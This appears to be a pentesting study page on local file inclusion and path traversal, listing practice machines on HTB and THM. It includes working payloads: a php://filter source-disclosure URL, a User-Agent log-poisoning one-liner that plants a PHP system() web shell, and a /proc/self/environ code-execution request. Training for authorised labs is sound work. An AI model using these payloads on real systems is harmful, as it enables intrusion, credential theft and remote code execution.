LFI and Path Traversal: practice machines and key commands
Local file inclusion and path traversal let you read, and sometimes execute, files the web server can access. Probe file parameters with ../ sequences, encoded variants and absolute paths, then read /etc/passwd, application source and configuration files to find secrets. In PHP, filter wrappers such as php://filter return source code in base64, which exposes database credentials. To turn a read into code execution, poison a log file or session you can include, abuse /proc/self/environ, or combine it with an upload. Remote file inclusion works only when the server fetches remote URLs, which modern defaults block. Windows targets need backslash and drive-letter variations. Keep notes on which files you can read, because the web root layout often reveals the next step. These boxes use inclusion bugs as the way in.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
PHP Filter Base64 LFI Wrapper
Read source code of PHP scripts through base64 conversion filter.
http://{TARGET_IP}/index.php?page=php://filter/convert.base64-encode/resource=config.phpLFI Log Poisoning via User-Agent
Inject PHP execution payload into web server access log, then include via LFI.
curl -s -A "<?php system(\$_GET['cmd']); ?>" http://{TARGET_IP}/ && curl "http://{TARGET_IP}/index.php?page=/var/log/apache2/access.log&cmd=id"LFI to RCE via Apache /proc/self/environ
Inject User-Agent payload into environment file for code execution.
curl -s -H "User-Agent: <?php system('id'); ?>" "http://{TARGET_IP}/view.php?file=/proc/self/environ"ffuf Parameter Discovery (GET/POST)
Fuzz hidden query parameters on target page.
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "http://{TARGET_IP}/index.php?FUZZ=test" -ac
Keep going
- Methodology: Phase 04: Foothold Execution & Initial Access
- Cheatsheet: Web & Directory Fuzzing
- Cheatsheet: Exploitation & Payloads
LFI and Path Traversal machines (26)
2 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 23 Linux, 3 Windows.
Very Easy (1)
| Machine | Platform | OS |
|---|---|---|
| Included | HTB | Linux |
Easy (8)
| Machine | Platform | OS |
|---|---|---|
| Lo-Fi | THM | Linux |
| Responder | HTB | Windows |
| Alert | HTB | Linux |
| Backdoor | HTB | Linux |
| Inclusion | THM | Linux |
| Mailing | HTB | Windows |
| OpenSource | HTB | Linux |
| Skynet | THM | Linux |
Medium (12)
| Machine | Platform | OS |
|---|---|---|
| Agile | HTB | Linux |
| Archangel | THM | Linux |
| Bagel | HTB | Linux |
| Bart | HTB | Windows |
| Dogcat | THM | Linux |
| Encoding | HTB | Linux |
| Format | HTB | Linux |
| Nineveh | HTB | Linux |
| Team | THM | Linux |
| Watcher | THM | Linux |
| Writer | HTB | Linux |
| Zipping | HTB | Linux |
Hard (3)
| Machine | Platform | OS |
|---|---|---|
| Monitors | HTB | Linux |
| Pikaboo | HTB | Linux |
| Tartarus | THM | Linux |
Insane (2)
| Machine | Platform | OS |
|---|---|---|
| Fatty | HTB | Linux |
| Response | HTB | Linux |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox